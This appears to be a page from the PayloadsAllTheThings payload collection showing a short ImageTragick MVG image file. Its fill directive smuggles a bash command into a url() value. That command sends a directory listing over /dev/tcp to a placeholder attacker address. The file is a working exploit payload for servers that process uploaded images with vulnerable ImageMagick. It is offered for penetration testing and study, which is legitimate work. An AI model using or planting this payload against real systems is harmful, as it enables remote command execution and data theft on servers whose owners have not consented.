PayloadsAllTheThings/Upload insecure files/CVE Image Tragik/imagetragik1_payload_url_reverse_shell_bash.mvg

5 lines
140 B
Plaintext
Raw Normal View History

push graphic-context
viewbox 0 0 640 480
fill 'url(https://IP_ATTAQUANT"||/bin/bash -c "ls > /dev/tcp/IP_ATTAQUANT/80)'
pop graphic-context